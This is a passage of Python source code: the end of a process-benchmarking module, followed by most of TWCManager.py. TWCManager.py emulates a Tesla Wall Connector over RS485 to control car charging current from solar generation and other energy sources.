terminated by timeout. :param period: what is measurement period length. """ self.args = args self.report_created = datetime.datetime.now() self.time_passed = time_passed self.stats = stats self.is_killed = is_killed self.period = period @property def cpu(self) -> List[float]: """ Return list of cpu usage records. :return: list of cpu usage values """ return list(map(attrgetter("cpu"), self.stats)) @property def mem(self) -> List[float]: """ Return list of memory usage records. :return: list of memory usage values """ return list(map(attrgetter("mem"), self.stats)) def __str__(self) -> str: """ Render report to string. :return: string representation of report. """ return inspect.cleandoc( f""" == Report created {self.report_created} == Arguments are `{self.args}` Time passed {self.time_passed} Terminated by timeout: {self.is_killed} Cpu(%) mean: {mean(self.cpu)} Cpu(%) min: {min(self.cpu)} Cpu(%) max: {max(self.cpu)} Mem(kb) mean: {mean(self.mem)} Mem(kb) min: {min(self.mem)} Mem(kb) max: {max(self.mem)} """ ) class Executor: """Process execution and resources measurement.""" def __init__(self, period: float = 0.1, timeout: float = 30): """ Set executor with parameters. :param period: period to take resource measurement. :param timeout: time limit to perform test, test process will be killed after timeout. """ self.period = period self.timeout = timeout def run(self, func: Callable, args: tuple) -> ExecReport: """ Run function to be tested for performance. :param func: function or callable to be tested for performance. :param args: tuple of argument to pass to function tested. 
:return: execution report for single test run """ process = self._prepare(func, args) time_usage, stats, killed = self._measure(process) return self._report(args, time_usage, stats, killed) @staticmethod def _prepare(func: Callable, args: tuple) -> Process: """ Start process and wait process ready to be measured. :param func: function or callable to be tested for performance. :param args: tuple of argument to pass to function tested. :return: process with tested code """ control: BenchmarkControl = BenchmarkControl() process = Process(target=func, args=(control, *args)) process.start() msg = control.wait_msg() if msg != control.START_MSG: raise ValueError("Msg does not match control start message.") return process def _measure( self, process: multiprocessing.Process ) -> Tuple[float, List[ResourceStats], bool]: """ Measure resources consumed by the process. :param process: process to measure resource consumption :return: time used, list of resource stats, was killed """ started_time = time.time() is_killed = False proc_info = psutil.Process(process.pid) stats = [] with timeit_context() as timeit: while process.is_alive(): if time.time() - started_time > self.timeout: is_killed = True break stats.append(self._get_stats_record(proc_info)) time.sleep(self.period) if is_killed: process.terminate() process.join() time_usage = timeit.time_passed return time_usage, stats, is_killed @staticmethod def _get_stats_record(proc_info: psutil.Process) -> ResourceStats: """ Read resources usage and create record. :param proc_info: process information to get cpu usage and memory usage from. :return: one time resource stats record """ return ResourceStats( time.time(), proc_info.cpu_percent(), memory_profiler.memory_usage(proc_info.pid, max_usage=True), ) def _report( self, args: tuple, time_passed: float, stats: List[ResourceStats], is_killed: bool, ) -> ExecReport: """ Create execution report. :param args: tuple of argument to pass to function tested. :param time_passed: time test function was executed. :param stats: list of ResourceStats: cpu, mem. :param is_killed: was process terminated by timeout. :return: test case one execution report """ return ExecReport(args, time_passed, stats, is_killed, self.period)
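# A short usage sketch for Executor (not part of the module above). The tested
# callable receives a BenchmarkControl instance as its first argument and has
# to announce that measurement can begin; the cpu_burn body and the
# control.start() call are assumptions made for illustration -- adjust the
# call to however BenchmarkControl actually emits its START_MSG in your setup.
import time


def cpu_burn(control, run_time: float) -> None:
    """Busy-loop for run_time seconds so there is something to measure."""
    control.start()  # assumed to send BenchmarkControl.START_MSG to the parent
    deadline = time.time() + run_time
    while time.time() < deadline:
        sum(i * i for i in range(1000))


if __name__ == "__main__":
    report = Executor(period=0.1, timeout=10).run(cpu_burn, (2.0,))
    print(report)  # formatted ExecReport, as rendered by __str__ above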
TWCManager.py
#! /usr/bin/python3 ################################################################################ # Code and TWC protocol reverse engineering by Chris Dragon. # # Additional logs and hints provided by Teslamotorsclub.com users: # TheNoOne, IanAmber, and twc. # Thank you! # # For support and information, please read through this thread: # https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830 # # Report bugs at https://github.com/ngardiner/TWCManager/issues # # This software is released under the "Unlicense" model: http://unlicense.org # This means source code and TWC protocol knowledge are released to the general # public free for personal or commercial use. I hope the knowledge will be used # to increase the use of green energy sources by controlling the time and power # level of car charging. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # # For more information, please visit http://unlicense.org import commentjson import importlib import json import os.path import math import re import sys from termcolor import colored import time import traceback from datetime import datetime import threading from ww import f from lib.TWCManager.TWCMaster import TWCMaster import requests # Define available modules for the instantiator # All listed modules will be loaded at boot time # Logging modules should be the first one to load modules_available = [ "Logging.ConsoleLogging", "Logging.FileLogging", "Logging.CSVLogging", "Logging.MySQLLogging", # "Logging.SQLiteLogging", "Interface.Dummy", "Interface.RS485", "Interface.TCP", "Policy.Policy", "Vehicle.TeslaAPI", "Control.WebIPCControl", "Control.HTTPControl", "Control.MQTTControl", "EMS.Enphase", "EMS.Fronius", "EMS.HASS", "EMS.SolarEdge", "EMS.SolarLog", "EMS.TeslaPowerwall2", "EMS.TED", "EMS.OpenHab", "EMS.Kostal", "Status.HASSStatus", "Status.MQTTStatus", ] # Enable support for Python Visual Studio Debugger if "DEBUG_SECRET" in os.environ: import ptvsd ptvsd.enable_attach(os.environ["DEBUG_SECRET"]) ptvsd.wait_for_attach() ########################## # Load Configuration File config = None jsonconfig = None if os.path.isfile("/etc/twcmanager/config.json"): jsonconfig = open("/etc/twcmanager/config.json") else: if os.path.isfile("config.json"): jsonconfig = open("config.json") if jsonconfig: config = commentjson.load(jsonconfig) else: debugLog(1, "Unable to find a configuration file.") sys.exit() # All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our # fake TWC ID. There is a 1 in 64535 chance that this ID will match each real # TWC on the network, in which case you should pick a different random id below. # This isn't really too important because even if this ID matches another TWC on # the network, that TWC will pick its own new random ID as soon as it sees ours # conflicts. 
fakeTWCID = bytearray(b"\x77\x77") # # End configuration parameters # ############################## ############################## # # Begin functions # def debugLog(minlevel, message): if master == None: # It arrives only here if nothing is set if config["config"]["debugLevel"] >= minlevel: print( colored(master.time_now() + " ", "yellow") + colored("TWCManager", "green") + colored(f(" {minlevel} "), "cyan") + f("{message}") ) else: master.debugLog(minlevel, "TWCManager", message) def hex_str(s: str): return " ".join("{:02X}".format(ord(c)) for c in s) def hex_str(ba: bytearray): return " ".join("{:02X}".format(c) for c in ba) def time_now(): global config return datetime.now().strftime( "%H:%M:%S" + (".%f" if config["config"]["displayMilliseconds"] else "") ) def unescape_msg(msg: bytearray, msgLen): # Given a message received on the RS485 network, remove leading and trailing # C0 byte, unescape special byte values, and verify its data matches the CRC # byte. msg = msg[0:msgLen] # See notes in RS485.send() for the way certain bytes in messages are escaped. # We basically want to change db dc into c0 and db dd into db. # Only scan to one less than the length of the string to avoid running off # the end looking at i+1. i = 0 while i < len(msg): if msg[i] == 0xDB: if msg[i + 1] == 0xDC: # Replace characters at msg[i] and msg[i+1] with 0xc0, # shortening the string by one character. In Python, msg[x:y] # refers to a substring starting at x and ending immediately # before y. y - x is the length of the substring. msg[i : i + 2] = [0xC0] elif msg[i + 1] == 0xDD: msg[i : i + 2] = [0xDB] else: debugLog( 1, "ERROR: Special character 0xDB in message is " "followed by invalid character 0x%02X. " "Message may be corrupted." % (msg[i + 1]), ) # Replace the character with something even though it's probably # not the right thing. msg[i : i + 2] = [0xDB] i = i + 1 # Remove leading and trailing C0 byte. msg = msg[1 : len(msg) - 1] return msg def background_tasks_thread(master): carapi = master.getModuleByName("TeslaAPI") while True: try: task = master.getBackgroundTask() if task["cmd"] == "applyChargeLimit": carapi.applyChargeLimit(limit=task["limit"]) elif task["cmd"] == "charge": # car_api_charge does nothing if it's been under 60 secs since it # was last used so we shouldn't have to worry about calling this # too frequently. 
carapi.car_api_charge(task["charge"]) elif task["cmd"] == "carApiEmailPassword": carapi.setCarApiLastErrorTime(0) carapi.car_api_available(task["email"], task["password"]) elif task["cmd"] == "checkArrival": limit = ( carapi.lastChargeLimitApplied if carapi.lastChargeLimitApplied != 0 else -1 ) carapi.applyChargeLimit(limit=limit, checkArrival=True) elif task["cmd"] == "checkCharge": carapi.updateChargeAtHome() elif task["cmd"] == "checkDeparture": carapi.applyChargeLimit( limit=carapi.lastChargeLimitApplied, checkDeparture=True ) elif task["cmd"] == "checkGreenEnergy": check_green_energy() elif task["cmd"] == "getLifetimekWh": master.getSlaveLifetimekWh() elif task["cmd"] == "getVehicleVIN": master.getVehicleVIN(task["slaveTWC"], task["vinPart"]) elif task["cmd"] == "snapHistoryData": master.snapHistoryData() elif task["cmd"] == "updateStatus": update_statuses() elif task["cmd"] == "webhook": if(config["config"].get("webhookMethod", "POST") == "GET"): requests.get(task["url"]) else: body = master.getStatus() requests.post(task["url"], json=body) elif task["cmd"] == "saveSettings": master.saveSettings() except: master.debugLog( 1, "TWCManager", colored("BackgroundError", "red") + ": " + traceback.format_exc() + ", occurred when processing background task", ) pass # Delete task['cmd'] from backgroundTasksCmds such that # queue_background_task() can queue another task['cmd'] in the future. master.deleteBackgroundTask(task) # task_done() must be called to let the queue know the task is finished. # backgroundTasksQueue.join() can then be used to block until all tasks # in the queue are done. master.doneBackgroundTask() def check_green_energy(): global config, hass, master # Check solar panel generation using an API exposed by # the HomeAssistant API. # # You may need to customize the sensor entity_id values # to match those used in your environment. This is configured # in the config section at the top of this file. 
# greenEnergyAmpsOffset = config["config"]["greenEnergyAmpsOffset"] if greenEnergyAmpsOffset >= 0: master.setConsumption( "Manual", master.convertAmpsToWatts(greenEnergyAmpsOffset) ) else: master.setGeneration( "Manual", -1 * master.convertAmpsToWatts(greenEnergyAmpsOffset) ) # Poll all loaded EMS modules for consumption and generation values for module in master.getModulesByType("EMS"): master.setConsumption(module["name"], module["ref"].getConsumption()) master.setGeneration(module["name"], module["ref"].getGeneration()) master.setMaxAmpsToDivideAmongSlaves(master.getMaxAmpsToDivideGreenEnergy()) def update_statuses(): # Print a status update if we are on track green energy showing the # generation and consumption figures maxamps = master.getMaxAmpsToDivideAmongSlaves() maxampsDisplay = f("{maxamps:.2f}A") if master.getModuleByName("Policy").policyIsGreen(): genwatts = master.getGeneration() conwatts = master.getConsumption() chgwatts = master.getChargerLoad() for module in master.getModulesByType("Logging"): module["ref"].greenEnergy( {"genWatts": genwatts, "conWatts": conwatts, "chgWatts": chgwatts} ) nominalOffer = master.convertWattsToAmps( genwatts - (conwatts - (chgwatts if config["config"]["subtractChargerLoad"] else 0)) ) if abs(maxamps - nominalOffer) > 0.005: nominalOfferDisplay = f("{nominalOffer:.2f}A") debugLog( 10, f( "Offering {maxampsDisplay} instead of {nominalOfferDisplay} to compensate for inexact current draw" ), ) conwatts = genwatts - master.convertAmpsToWatts(maxamps) generation = f("{master.convertWattsToAmps(genwatts):.2f}A") consumption = f("{master.convertWattsToAmps(conwatts):.2f}A") debugLog( 1, f( "Limiting charging to {colored(generation, 'magenta')} - {colored(consumption, 'magenta')} = {colored(maxampsDisplay, 'magenta')}." ), ) else: # For all other modes, simply show the Amps to charge at debugLog(1, f("Limiting charging to {colored(maxampsDisplay, 'magenta')}.")) # Print minimum charge for all charging policies minchg = f("{config['config']['minAmpsPerTWC']}A") debugLog(1, f("Charge when above {colored(minchg, 'magenta')} (minAmpsPerTWC).")) # Update Sensors with min/max amp values for module in master.getModulesByType("Status"): module["ref"].setStatus( bytes("config", "UTF-8"), "min_amps_per_twc", "minAmpsPerTWC", config["config"]["minAmpsPerTWC"], "A", ) module["ref"].setStatus( bytes("all", "UTF-8"), "max_amps_for_slaves", "maxAmpsForSlaves", master.getMaxAmpsToDivideAmongSlaves(), "A", ) # # End functions # ############################## ############################## # # Begin global vars # data = "" dataLen = 0 ignoredData = bytearray() msg = bytearray() msgLen = 0 numInitMsgsToSend = 10 msgRxCount = 0 idxSlaveToSendNextHeartbeat = 0 timeLastkWhDelivered = time.time() timeLastkWhSaved = time.time() timeLastHeartbeatDebugOutput = 0 webMsgPacked = "" webMsgMaxSize = 300 webMsgResult = 0 timeTo0Aafter06 = 0 timeToRaise2A = 0 # # End global vars # ############################## ############################## # # Begin main program # # Instantiate necessary classes master = TWCMaster(fakeTWCID, config) # Instantiate all modules in the modules_available list automatically for module in modules_available: modulename = [] if str(module).find(".") != -1: modulename = str(module).split(".") try: moduleref = importlib.import_module("lib.TWCManager." 
+ module) modclassref = getattr(moduleref, modulename[1]) modinstance = modclassref(master) # Register the new module with master class, so every other module can # interact with it master.registerModule( {"name": modulename[1], "ref": modinstance, "type": modulename[0]} ) except ImportError as e: master.debugLog( 1, "TWCManager", colored("ImportError", "red") + ": " + str(e) + ", when importing module " + colored(module, "red") + ", not using " + colored(module, "red"), ) except ModuleNotFoundError as e: master.debugLog( 1, "TWCManager", colored("ModuleNotFoundError", "red") + ": " + str(e) + ", when importing " + colored(module, "red") + ", not using " + colored(module, "red"), ) except: raise # Load settings from file master.loadSettings() # Create a background thread to handle tasks that take too long on the main # thread. For a primer on threads in Python, see: # http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/ backgroundTasksThread = threading.Thread(target=background_tasks_thread, args=(master,)) backgroundTasksThread.daemon = True backgroundTasksThread.start() debugLog( 1, "TWC Manager starting as fake %s with id %02X%02X and sign %02X" % ( ("Master" if config["config"]["fakeMaster"] else "Slave"), ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(master.getSlaveSign()), ), ) while True: try: # In this area, we always send a linkready message when we first start. # Whenever there is no data available from other TWCs to respond to, # we'll loop back to this point to send another linkready or heartbeat # message. By only sending our periodic messages when no incoming # message data is available, we reduce the chance that we will start # transmitting a message in the middle of an incoming message, which # would corrupt both messages. # Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means # less power used and less waste heat. time.sleep(0.025) now = time.time() if config["config"]["fakeMaster"] == 1: # A real master sends 5 copies of linkready1 and linkready2 whenever # it starts up, which we do here. # It doesn't seem to matter if we send these once per second or once # per 100ms so I do once per 100ms to get them over with. if numInitMsgsToSend > 5: master.send_master_linkready1() time.sleep(0.1) # give slave time to respond numInitMsgsToSend -= 1 elif numInitMsgsToSend > 0: master.send_master_linkready2() time.sleep(0.1) # give slave time to respond numInitMsgsToSend = numInitMsgsToSend - 1 else: # After finishing the 5 startup linkready1 and linkready2 # messages, master will send a heartbeat message to every slave # it's received a linkready message from. Do that here. # A real master would keep sending linkready messages periodically # as long as no slave was connected, but since real slaves send # linkready once every 10 seconds till they're connected to a # master, we'll just wait for that. if time.time() - master.getTimeLastTx() >= 1.0: # It's been about a second since our last heartbeat. if master.countSlaveTWC() > 0: slaveTWC = master.getSlaveTWC(idxSlaveToSendNextHeartbeat) if time.time() - slaveTWC.timeLastRx > 26: # A real master stops sending heartbeats to a slave # that hasn't responded for ~26 seconds. It may # still send the slave a heartbeat every once in # awhile but we're just going to scratch the slave # from our little black book and add them again if # they ever send us a linkready. debugLog( 1, "WARNING: We haven't heard from slave " "%02X%02X for over 26 seconds. 
" "Stop sending them heartbeat messages." % (slaveTWC.TWCID[0], slaveTWC.TWCID[1]), ) master.deleteSlaveTWC(slaveTWC.TWCID) else: slaveTWC.send_master_heartbeat() idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1 if idxSlaveToSendNextHeartbeat >= master.countSlaveTWC(): idxSlaveToSendNextHeartbeat = 0 time.sleep(0.1) # give slave time to respond else: # As long as a slave is running, it sends link ready messages every # 10 seconds. They trigger any master on the network to handshake # with the slave and the master then sends a status update from the # slave every 1-3 seconds. Master's status updates trigger the slave # to send back its own status update. # As long as master has sent a status update within the last 10 # seconds, slaves don't send link ready. # I've also verified that masters don't care if we stop sending link # ready as long as we send status updates in response to master's # status updates. if ( config["config"]["fakeMaster"] != 2 and time.time() - master.getTimeLastTx() >= 10.0 ): debugLog( 1, "Advertise fake slave %02X%02X with sign %02X is " "ready to link once per 10 seconds as long as master " "hasn't sent a heartbeat in the last 10 seconds." % ( ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(master.getSlaveSign()), ), ) master.send_slave_linkready() # See if there's any message from the web interface. if master.getModuleByName("WebIPCControl"): master.getModuleByName("WebIPCControl").processIPC() # If it has been more than 2 minutes since the last kWh value, # queue the command to request it from slaves if config["config"]["fakeMaster"] == 1 and ( (time.time() - master.lastkWhMessage) > (60 * 2) ): master.lastkWhMessage = time.time() master.queue_background_task({"cmd": "getLifetimekWh"}) # If it has been more than 1 minute since the last VIN query with no # response, and if we haven't queried more than 5 times already for this # slave TWC, repeat the query master.retryVINQuery() ######################################################################## # See if there's an incoming message on the input interface. timeMsgRxStart = time.time() while True: now = time.time() dataLen = master.getModuleByName("RS485").getBufferLen() if dataLen == 0: if msgLen == 0: # No message data waiting and we haven't received the # start of a new message yet. Break out of inner while # to continue at top of outer while loop where we may # decide to send a periodic message. break else: # No message data waiting but we've received a partial # message that we should wait to finish receiving. if now - timeMsgRxStart >= 2.0: debugLog( 9, "Msg timeout (" + hex_str(ignoredData) + ") " + hex_str(msg[0:msgLen]), ) msgLen = 0 ignoredData = bytearray() break time.sleep(0.025) continue else: dataLen = 1 data = master.getModuleByName("RS485").read(dataLen) if dataLen != 1: # This should never happen debugLog(1, "WARNING: No data available.") break timeMsgRxStart = now timeLastRx = now if msgLen == 0 and data[0] != 0xC0: # We expect to find these non-c0 bytes between messages, so # we don't print any warning at standard debug levels. debugLog(11, "Ignoring byte %02X between messages." % (data[0])) ignoredData += data continue elif msgLen > 0 and msgLen < 15 and data[0] == 0xC0: # If you see this when the program is first started, it # means we started listening in the middle of the TWC # sending a message so we didn't see the whole message and # must discard it. That's unavoidable. # If you see this any other time, it means there was some # corruption in what we received. 
It's normal for that to # happen every once in awhile but there may be a problem # such as incorrect termination or bias resistors on the # rs485 wiring if you see it frequently. debugLog( 10, "Found end of message before full-length message received. " "Discard and wait for new message.", ) msg = data msgLen = 1 continue if msgLen == 0: msg = bytearray() msg += data msgLen += 1 # Messages are usually 17 bytes or longer and end with \xc0\xfe. # However, when the network lacks termination and bias # resistors, the last byte (\xfe) may be corrupted or even # missing, and you may receive additional garbage bytes between # messages. # # TWCs seem to account for corruption at the end and between # messages by simply ignoring anything after the final \xc0 in a # message, so we use the same tactic. If c0 happens to be within # the corrupt noise between messages, we ignore it by starting a # new message whenever we see a c0 before 15 or more bytes are # received. # # Uncorrupted messages can be over 17 bytes long when special # values are "escaped" as two bytes. See notes in sendMsg. # # To prevent most noise between messages, add a 120ohm # "termination" resistor in parallel to the D+ and D- lines. # Also add a 680ohm "bias" resistor between the D+ line and +5V # and a second 680ohm "bias" resistor between the D- line and # ground. See here for more information: # https://www.ni.com/support/serial/resinfo.htm # http://www.ti.com/lit/an/slyt514/slyt514.pdf # This explains what happens without "termination" resistors: # https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly if msgLen >= 16 and data[0] == 0xC0: break if msgLen >= 16: msg = unescape_msg(msg, msgLen) # Set msgLen = 0 at start so we don't have to do it on errors below. # len($msg) now contains the unescaped message length. msgLen = 0 msgRxCount += 1 # When the sendTWCMsg web command is used to send a message to the # TWC, it sets lastTWCResponseMsg = b''. When we see that here, # set lastTWCResponseMsg to any unusual message received in response # to the sent message. Never set lastTWCResponseMsg to a commonly # repeated message like master or slave linkready, heartbeat, or # voltage/kWh report. if ( master.lastTWCResponseMsg == b"" and msg[0:2] != b"\xFB\xE0" and msg[0:2] != b"\xFD\xE0" and msg[0:2] != b"\xFC\xE1" and msg[0:2] != b"\xFB\xE2" and msg[0:2] != b"\xFD\xE2" and msg[0:2] != b"\xFB\xEB" and msg[0:2] != b"\xFD\xEB" and msg[0:2] != b"\xFD\xE0" ): master.lastTWCResponseMsg = msg debugLog(9, "Rx@" + ": (" + hex_str(ignoredData) + ") " + hex_str(msg) + "") ignoredData = bytearray() # After unescaping special values and removing the leading and # trailing C0 bytes, the messages we know about are always 14 bytes # long in original TWCs, or 16 bytes in newer TWCs (protocolVersion # == 2). if len(msg) != 14 and len(msg) != 16 and len(msg) != 20: debugLog( 1, "ERROR: Ignoring message of unexpected length %d: %s" % (len(msg), hex_str(msg)), ) continue checksumExpected = msg[len(msg) - 1] checksum = 0 for i in range(1, len(msg) - 1): checksum += msg[i] if (checksum & 0xFF) != checksumExpected: debugLog( 1, "ERROR: Checksum %X does not match %02X. 
Ignoring message: %s" % (checksum, checksumExpected, hex_str(msg)), ) continue if config["config"]["fakeMaster"] == 1: ############################ # Pretend to be a master TWC foundMsgMatch = False # We end each regex message search below with \Z instead of $ # because $ will match a newline at the end of the string or the # end of the string (even without the re.MULTILINE option), and # sometimes our strings do end with a newline character that is # actually the CRC byte with a value of 0A or 0D. msgMatch = re.search(b"^\xfd\xb1(..)\x00\x00.+\Z", msg, re.DOTALL) if msgMatch and foundMsgMatch == False: # Handle acknowledgement of Start command foundMsgMatch = True senderID = msgMatch.group(1) msgMatch = re.search(b"^\xfd\xb2(..)\x00\x00.+\Z", msg, re.DOTALL) if msgMatch and foundMsgMatch == False: # Handle acknowledgement of Stop command foundMsgMatch = True senderID = msgMatch.group(1) msgMatch = re.search( b"^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle linkready message from slave. # # We expect to see one of these before we start sending our # own heartbeat message to slave. # Once we start sending our heartbeat to slave once per # second, it should no longer send these linkready messages. # If slave doesn't hear master's heartbeat for around 10 # seconds, it sends linkready once per 10 seconds and starts # flashing its red LED 4 times with the top green light on. # Red LED stops flashing if we start sending heartbeat # again. foundMsgMatch = True senderID = msgMatch.group(1) sign = msgMatch.group(2) maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100 debugLog( 1, "%.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % (maxAmps, senderID[0], senderID[1], hex_str(sign)), ) if maxAmps >= 80: # U.S. chargers need a spike to 21A to cancel a 6A # charging limit imposed in an Oct 2017 Tesla car # firmware update. See notes where # spikeAmpsToCancel6ALimit is used. master.setSpikeAmps(21) else: # EU chargers need a spike to only 16A. This value # comes from a forum post and has not been directly # tested. master.setSpikeAmps(16) if senderID == fakeTWCID: debugLog( 1, "Slave TWC %02X%02X reports same TWCID as master. " "Slave should resolve by changing its TWCID." % (senderID[0], senderID[1]), ) # I tested sending a linkready to a real master with the # same TWCID as master and instead of master sending back # its heartbeat message, it sent 5 copies of its # linkready1 and linkready2 messages. Those messages # will prompt a real slave to pick a new random value # for its TWCID. # # We mimic that behavior by setting numInitMsgsToSend = # 10 to make the idle code at the top of the for() # loop send 5 copies of linkready1 and linkready2. numInitMsgsToSend = 10 continue # We should always get this linkready message at least once # and generally no more than once, so this is a good # opportunity to add the slave to our known pool of slave # devices. slaveTWC = master.newSlave(senderID, maxAmps) if ( slaveTWC.protocolVersion == 1 and slaveTWC.minAmpsTWCSupports == 6 ): if len(msg) == 14: slaveTWC.protocolVersion = 1 slaveTWC.minAmpsTWCSupports = 5 elif len(msg) == 16: slaveTWC.protocolVersion = 2 slaveTWC.minAmpsTWCSupports = 6 debugLog( 1, "Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d." % ( senderID[0], senderID[1], slaveTWC.protocolVersion, slaveTWC.minAmpsTWCSupports, ), ) # We expect maxAmps to be 80 on U.S. chargers and 32 on EU # chargers. 
Either way, don't allow # slaveTWC.wiringMaxAmps to be greater than maxAmps. if slaveTWC.wiringMaxAmps > maxAmps: debugLog( 1, "\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to " + str(config["config"]["wiringMaxAmpsPerTWC"]) + " which is greater than the max " + str(maxAmps) + " amps your charger says it can handle. " "Please review instructions in the source code and consult an " "electrician if you don't know what to do.", ) slaveTWC.wiringMaxAmps = maxAmps / 4 # Make sure we print one SHB message after a slave # linkready message is received by clearing # lastHeartbeatDebugOutput. This helps with debugging # cases where I can't tell if we responded with a # heartbeat or not. slaveTWC.lastHeartbeatDebugOutput = "" slaveTWC.timeLastRx = time.time() slaveTWC.send_master_heartbeat() else: msgMatch = re.search( b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle heartbeat message from slave. # # These messages come in as a direct response to each # heartbeat message from master. Slave does not send its # heartbeat until it gets one from master first. # A real master sends heartbeat to a slave around once per # second, so we do the same near the top of this for() # loop. Thus, we should receive a heartbeat reply from the # slave around once per second as well. foundMsgMatch = True senderID = msgMatch.group(1) receiverID = msgMatch.group(2) heartbeatData = msgMatch.group(3) try: slaveTWC = master.getSlaveByID(senderID) except KeyError: # Normally, a slave only sends us a heartbeat message if # we send them ours first, so it's not expected we would # hear heartbeat from a slave that's not in our list. debugLog( 1, "ERROR: Received heartbeat message from " "slave %02X%02X that we've not met before." % (senderID[0], senderID[1]), ) continue if fakeTWCID == receiverID: slaveTWC.receive_slave_heartbeat(heartbeatData) else: # I've tried different fakeTWCID values to verify a # slave will send our fakeTWCID back to us as # receiverID. However, I once saw it send receiverID = # 0000. # I'm not sure why it sent 0000 and it only happened # once so far, so it could have been corruption in the # data or an unusual case. debugLog( 1, "WARNING: Slave TWC %02X%02X status data: " "%s sent to unknown TWC %02X%02X." % ( senderID[0], senderID[1], hex_str(heartbeatData), receiverID[0], receiverID[1], ), ) else: msgMatch = re.search( b"\A\xfd\xeb(..)(....)(..)(..)(..)(.+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle kWh total and voltage message from slave. # # This message can only be generated by TWCs running newer # firmware. I believe it's only sent as a response to a # message from Master in this format: # FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00 # According to FuzzyLogic, this message has the following # format on an EU (3-phase) TWC: # FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00 # 00000038 (56) is the total kWh delivered to cars # by this TWC since its construction. # 00E6 (230) is voltage on phase A # 00F1 (241) is voltage on phase B # 00E8 (232) is voltage on phase C # # I'm guessing in world regions with two-phase power that # this message would be four bytes shorter, but the pattern # above will match a message of any length that starts with # FD EB. 
foundMsgMatch = True senderID = msgMatch.group(1) lifetimekWh = msgMatch.group(2) kWh = ( (lifetimekWh[0] << 24) + (lifetimekWh[1] << 16) + (lifetimekWh[2] << 8) + lifetimekWh[3] ) vPhaseA = msgMatch.group(3) voltsPhaseA = (vPhaseA[0] << 8) + vPhaseA[1] vPhaseB = msgMatch.group(4) voltsPhaseB = (vPhaseB[0] << 8) + vPhaseB[1] vPhaseC = msgMatch.group(5) voltsPhaseC = (vPhaseC[0] << 8) + vPhaseC[1] data = msgMatch.group(6) for module in master.getModulesByType("Logging"): module["ref"].slaveStatus( { "TWCID": senderID, "kWh": kWh, "voltsPerPhase": [ voltsPhaseA, voltsPhaseB, voltsPhaseC, ], } ) # Update the timestamp of the last reciept of this message master.lastkWhMessage = time.time() # Every time we get this message, we re-queue the query master.queue_background_task({"cmd": "getLifetimekWh"}) # Update this detail for the Slave TWC master.updateSlaveLifetime( senderID, kWh, voltsPhaseA, voltsPhaseB, voltsPhaseC ) else: msgMatch = re.search( b"\A\xfd(\xee|\xef|\xf1)(..)(.+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Get 7 characters of VIN from slave. (XE is first 7, XF second 7) # # This message can only be generated by TWCs running newer # firmware. I believe it's only sent as a response to a # message from Master in this format: # FB EE <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00 # Response message is FD EE <Slave TWCID> VV VV VV VV VV VV VV where VV is an ascii character code # representing a letter or number. VV will be all zero when car CAN communication is disabled # (DIP switch 2 down) or when a non-Tesla vehicle is plugged in using something like a JDapter. foundMsgMatch = True vinPart = msgMatch.group(1) senderID = msgMatch.group(2) data = msgMatch.group(3) debugLog( 6, "Slave TWC %02X%02X reported VIN data: %s." % (senderID[0], senderID[1], hex_str(data)), ) slaveTWC = master.getSlaveByID(senderID) if vinPart == b"\xee": vinPart = 0 if vinPart == b"\xef": vinPart = 1 if vinPart == b"\xf1": vinPart = 2 slaveTWC.VINData[vinPart] = data.decode("utf-8").rstrip("\x00") if vinPart < 2: vinPart += 1 master.getVehicleVIN(senderID, vinPart) master.queue_background_task( { "cmd": "getVehicleVIN", "slaveTWC": senderID, "vinPart": str(vinPart), } ) else: slaveTWC.currentVIN = "".join(slaveTWC.VINData) # Clear VIN retry timer slaveTWC.lastVINQuery = 0 slaveTWC.vinQueryAttempt = 0 # Record this vehicle being connected master.recordVehicleVIN(slaveTWC) # Send VIN data to Status modules master.updateVINStatus() vinPart += 1 debugLog( 6, "Current VIN string is: %s at part %d." % (str(slaveTWC.VINData), vinPart), ) else: msgMatch = re.search( b"\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL, ) if msgMatch and foundMsgMatch == False: foundMsgMatch = True debugLog( 1, "ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. " "Search installation instruction PDF for 'rotary switch' and set " "switch so its arrow points to F on the dial.", ) if foundMsgMatch == False: debugLog( 1, "*** UNKNOWN MESSAGE FROM SLAVE:" + hex_str(msg) + "\nPlease private message user CDragon at http://teslamotorsclub.com " "with a copy of this error.", ) else: ########################### # Pretend to be a slave TWC foundMsgMatch = False msgMatch = re.search( b"\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z", msg, re.DOTALL, ) if msgMatch and 